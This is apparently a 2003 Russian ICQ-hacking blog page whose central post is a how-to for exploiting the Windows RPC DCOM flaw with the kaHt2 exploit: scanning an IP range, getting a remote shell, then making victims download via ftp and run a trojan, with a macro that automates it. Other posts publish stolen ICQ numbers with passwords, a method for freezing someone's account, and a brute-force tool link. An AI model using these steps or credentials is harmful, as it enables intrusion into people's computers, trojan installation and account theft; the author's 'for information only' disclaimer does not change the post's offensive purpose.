Доигрались..

Вторник, 19 августа 2003 г.
Просмотров: 586
Подписаться на комментарии по RSS

C 16 Августа больше не поддерживается 5 протокол. Под Асями которые содержали в пароле букву “у” больше нельзя залогинется.
Я потерял ab0000 и много чего еще без примари :(.

RPC Dcom - How To

Вторник, 19 августа 2003 г.
Просмотров: 578
Подписаться на комментарии по RSS

В последнее время я стал наблюдать исчерпание способов угнать UIN. Все сводится к тому, чтобы зарегистрировать не существующий (а ранее существовавший) e-mail и выслать на него пароль.
Я решил немного исправить положение и написать эту статью.

Речь пойдет о нашумевшей дыре в протоколе RPC Dcom на Windows системах. Информация о дыре была опубликована 16 Июля, 2003 года командой "Last Stage of Delirium". Уязвимость существует во всех стандартных инсталляциях Windows NT 4.0, Windows 2000, Windows XP, а также в так широко разрекламированном Windows 2003.

Был выпущен многопоточный, многоцелевой эксплоит, эксплуатирующий уязвимость в RPC Dcom. Эксплоит работает против большинства версий Microsoft Windows 2000/XP систем. Поддерживает различные макросы. Этот эксплоит мы и будем использовать для наших корыстных целей.

Скачиваем kaHt2, разархивируем архив в корень диска "С:\", после чего открываем "Srart -> Run" и вбиваем следующею команду "C\:kaHt2.exe 195.96.185.1 195.96.185.255 300 " и жмем "Ok". "195.96.185.1 195.96.185.255" это диапазон IP, которые будут сканироваться. "300" это количество потоков сканирования.
В случаи нахождения уязвимой машины, вы увидите примерно эту строчку "C:\WINDOWS\system32>".
Дальше нам надо закачать троян и с помощью него скачать .dat файл или любую вас интересующую информацию.
Качаем RPC Exploit GUI v2, разархивируем и запускаем "RPC GUI v2 - r3L4x.exe", после чего идем в раздел "FTP Server" и запускаем свой FTP сервер нажатием на кнопку "Start".
Выбор трояна для использования оставляю на ваш выбор, этого добра в инете полным полно.
Допустим что вы выбрали троян и создали сервер для закачки, назвав его trojan_server.exe. Далее кладем trojan_server.exe в корень диска "C:\".
Возвращаемся к нашему эксплоиту и выполняем следующие команды:

1) Пишем "ftp", если все правильно, то вас перекинет на следующую строчку.
2) Пишем "open xxx.xx.xxx.xxx" вместо крестов - ваш IP.
3) Если предыдущий пункт выполнен правильно, вас спросят имя пользователя, тут пишем "asdf".
4) Пишем "get /trojan_server.exe" чтобы атакуемый компьютер скачал ваш троян.
5) Пишем "!trojan_server.exe" чтобы атакуемый компьютер запустил ваш троян smile.
6) Пишем "exit" чтобы выйти с шела уязвимой машины и начать поиски следующей жертвы.

Я упростил эти действия, написав маленький макрос. Макрос должен лежать в одной директории с kaHt2.exe и называться macros.txt. Открываете macros.txt, стираете все содержимое файла и вбиваете следующий текст:

"[Macro]
name=upload_trojan
key=!1
delay=900
cmd=ftp
cmd=open xxx.xx.xxx.xxx
cmd=asdf
cmd=get \trojan_server.exe
cmd=!trojan_server.exe>>a
cmd=bye
"

После чего вам остается лишь набрать "!1" в шеле и все эти команды будут выполнены автоматом, ну а дальше пишите "exit" чтобы выйти с шела и начать искать нового "друга" smile.

Вроде бы все разложил по полочкам, так что вопросов, думаю, появится не должно.

Убедительная просьба если будете где выкладывать эту статью, ставить копирайт на автора (ven000m) и на этот сайт (Asechka.ru).

Всем спасибо, все свободны.

Обсуждение в форуме.


Использованные файлы:
kaHt2 – скачать.
RPC Exploit GUI v2 – скачать.

Использованный материал:
VOID.RU
securitylab.ru

Статья написано только для ознакомления. Автор не несет не какой ответственности за действия описанные в этой статье.

Скучно...

Воскресенье, 17 августа 2003 г.
Просмотров: 393
Подписаться на комментарии по RSS

Задача для особо одаренных! Нужно всего заменить "xx" на одинаковые символы...

~~~~~~~~~~~
uin: 296xx5
password: [nin]
~~~~~~~~~~~
uin: 4x1x03
password: [nin]
~~~~~~~~~~~
uin: 648159
password: [xix] wink)
~~~~~~~~~~~

Микрософт использует Линух?

Суббота, 16 августа 2003 г.
Просмотров: 605
Подписаться на комментарии по RSS

Довольно интересные результаты выдает фингерпринт оси windowsupdate.microsoft.com с помощью nmap'a.


Device type: general purpose
Running: Linux 2.1.X|2.2.X
OS details: Linux 2.1.19 - 2.2.20
Uptime 17.601 days (since Wed Jul 30 01:20:10 2003)


Интересно это фэйк или микрософт поняла прелесть открытого софта? =))))))

Этот и другой фингерпринт оси можно узнать на канале #icqhackers с помощью команды !os <ip>
К нам можно попасть
1) Через веб
2) Через асю, послав $start на уин 10399
3) Скачав скрипт монстра
4) Через ваш ирк клиент, сервер irc.icqinfo.ru канал #icqhackers

Немного халявы.

Пятница, 15 августа 2003 г.
Просмотров: 469
Подписаться на комментарии по RSS

Убедительная просьба. Если у вас уже есть шестизнак, не берите! Ну... в крайнем случае, возьмите, чтобы подарить (но ни в коем случае не продать!). Если увижу, что эти номера продаются, берегитесь =)
3517x0
374y57
65z741
9a2641
на всех номерах пароль: 1os7s0u1
халява от s0u1 s33k3r, так что лично я никакой ответственности за нее не несу.

Новый способ заморозки уинов.

Среда, 13 августа 2003 г.
Просмотров: 487
Подписаться на комментарии по RSS

Пердыстория: прошла информация, что человек с уина 209000000 кидает добропорядочных продавцов ась (тафтология неможно, но ничего). Мимо меня этот кидала тоже не прошел. Решил обменять два моих xyzxyz на 100903. Ну я предупрежденный и наглый взял и кинул его на 100903 wink.
Самое оно: после нехитрых комбинаций номер перестал логиниться, а если ввести неправильный пароль, то выдаст Wrong pass. Номер заморожен. Разморозкой служит icq password reset, но примак у него есть, но как я понял от 2001 года, а я выслал пароль на мыло из базы 99го, значит он отдыхает. Как только до конца разберусь в обнаруженном баге, выложу полное описание.
Bonus pack:
icq: 100903
pass: 243 10 21 18 13 166 243 13
Дерзайте!

RdM-[YanDeX]
icq105300
rdm-yandex@nnm.ru

RusIcq.net owned, или давайте жить по-честному.

Среда, 13 августа 2003 г.
Просмотров: 465
Подписаться на комментарии по RSS

Многоуважаемые продавцы уинов, имеющие свои сайты! Уважайте человеческий труд! Перестаньте покупать домены по ворованным кредитным картам, ведь платить честным образом $30 в год не так уж и проблематично!
RusIcq.net, например, больше никогда не будет продавать номера wink Подробности на главной странице, всем читать. Обсуждения на форуме. http://www.asechka.ru/forum/showthread.php?s=&threadid=3809

ICQ <=> IRC Gate

Понедельник, 11 августа 2003 г.
Просмотров: 637
Подписаться на комментарии по RSS

На нашем любимом =) канале реализован гейт ICQ <=> IRC. Теперь можно учавствовать в беседах канала даже не имея ИРК клиента.

Для того, чтобы воспользоваться гейтом пошлите на уин 10399 команду: $start
После этого вы будете получать все что пишется на канале, а ваши сообщения будут проговариваться ботом.
Чтобы выйти, пошлите $stop.

На нашем канале есть проверка уинов на инвизибл, выдача операционной системы сайта, переводчик, погода, проверка имэйл уинов по базе 99 года, розыгрыш пятизначек, ежедневная раздача шести и семизначек и много много другого =)

Также на канал можно зайти более традиционным образом:
1) Через веб-гейт: здесь
2) Скачав скрипт монстра: здесь
3) Через ваш ИРК клиент: сервер - irc.icqinfo.ru, канал - #icqhackers

Бесплатные UIN's от сайта NSD.ru

Воскресенье, 10 августа 2003 г.
Просмотров: 653
Подписаться на комментарии по RSS

Uin's пердоставлены сайтом NSD.ru - "НеСанкционированный Доступ".

Семь (7) Семизначек (7) с Семизначными (7) паролями =)
Хватайте быстрей, пока за Вас ето не сделал кто-нибудь еще!

4155689;nsd.ru#1
4229925;nsd.ru#2
4232055;nsd.ru#3
4233327;nsd.ru#4
4233905;nsd.ru#5
4246872;nsd.ru#6
4252075;nsd.ru#7

IPDbrute2/udc2 Pro

Пятница, 8 августа 2003 г.
Просмотров: 312
Подписаться на комментарии по RSS

http://www.ifud.ru/ipd/IPDbrute2udc2Pro.rar

Жутко кривая, совершенно нерабочая, один сплошной глюк/баг.
Просьба юзать с большой осторожностью, т.к. может проглотить некоторые уины, не выплюнув их, может сменить пасс и забыть его, никуда не записав, может просто упасть и так далее.

Судя по всему, в details.xml можно в тех полях, где предполагается стринг, а не численное значение, использовать макросы типа %RAND_NUM_1%, %RAND_NUM_2%, %RAND_GUID%, %RAND_TEXT1%, %RAND_TEXT2%, %RAND_TEXT3%, %RAND_TEXT4%...
например:
<main>
<nick>%RAND_NUM_1%</nick>
<first_name>%RAND_TEXT2%</first_name>
<last_name>%RAND_TEXT1%</last_name>
<pri_email>%RAND_TEXT3%@mail.com</pri_email>
если это работает, то по идее и еще более крутые макросы тоже работают =) но об них позже.

короче никаких притензий. если чё-то не так работает - пишите, исправлю может =)

(с) 2003 МЛУ\ша